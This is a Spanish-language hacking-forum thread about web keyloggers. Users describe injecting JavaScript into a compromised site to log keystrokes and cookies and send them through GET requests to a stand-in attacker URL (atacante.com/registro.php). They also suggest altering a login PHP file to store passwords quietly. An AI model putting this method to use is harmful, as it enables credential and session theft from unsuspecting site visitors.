¿Keylogger web?

Iniciado por DelArteOscuro, 22 Marzo 2012, 01:41 AM

0 Miembros y 1 Visitante están viendo este tema.

Luna71c0

Cita de: Bulld0z3r en 23 Agosto 2012, 19:22 PM
Hola.

No entiendo. La idea (no la del post, imagino  :xD, sino la del artículo enlazado) es colarlo en un servidor legítimo, para robo de credenciales; como alternativa a phising.

Saludos.
por eso mismo, te llevaria muchos problemas legales :P

Citar
Un pequeño paso para el programador....
Un gran paso para el hacker...

...]LunaHAck[...


i'm the "Luna71c0"

USLO

No lo entinedo referente al enlace que nos has mandado no entinedo esto!

De esta forma, con que un  ciberdelincuente pueda inyectar el código en un sitio web, sería capaz de obtener credenciales.



Que  alguine me explique esto de inyectar en un sitio WEB.
Osea cojes el sitio WEB de otro y le mtes tu JS?

No le veo sentido.

No lo veo plausible en la mayoria de los casos.
Si me equivoco , aclararmelo que me interesa este tema.  >:D

Saludos

#!drvy

CitarQue  alguine me explique esto de inyectar en un sitio WEB.
Osea cojes el sitio WEB de otro y le mtes tu JS?
Exacto, el atacante debe tener acceso al servidor.. ya sea mediante una vulnerabilidad o cualquier otra cosa... con tal de que pueda inyectar una linea de js le sirve..

Citarreitero no le encuentro sentido, prefiero plantar un keylogger y listo xD
El keylogger tambien te lleva a muchos problemas legales =) y ademas si plantas un keylogger en una web... te llevas credenciales de usuarios que nunca has llegado a conocer...

Claro que esto de hacer un keylogger en javascript es un rollo... si tienes acceso a los archivos (te vale con el de login) puedes modificar el PHP para que te almacene las claves y así todo es un poco mas "invisible" para la victima..

Saludos

h3ct0r

Creo que si se podría, en realidad suena bastante interesante como un POC.

Bueno en lineas generales creo que podrías hacerlo de la siguiente manera, no lo he probado así que puedo estar equivocado:

En teoría tendrías 2 sitios, http://www.victima.com/index.php y http://www.atacante.com .
Si tienes privilegios para escribir un archivo, puedes editar index.php en la pagina victima e insertar un javascript malicioso que haga lo siguiente:

Leer cada tecla pulsada por el teclado + la cookie y crear en cada keypress una imagen en el dom o un iframe que apunte hacia http://www.atacante.com/registro.php?cookie=123&keypress=E&dominio=victima.com (le pasas los datos que robas a través de una petición get y así haces bypass del filtro de seguridad de los navegadores).
Luego cada vez que registro.php reciba una peticion get, colocas esa información en una base de datos para luego trabajarlas y mostrarlas todas juntas por dominio y cookie (así sabes que las teclas pulsadas son de una persona en especifico de un sitio en especifico, ademas de que te permite loguearte después, tanto con la contraseña que saques, como por la cookie robada).

Esta bastante interesante la idea, si tuviera un poco mas de tiempo me gustaría desarrollarla por que le veo mucho potencial.  ;D

Por ahi hay un proyecto de javascript y perl que trojaniza por completo el navegador del usuario pero ahora no me acuerdo del nombre!
[img[/img]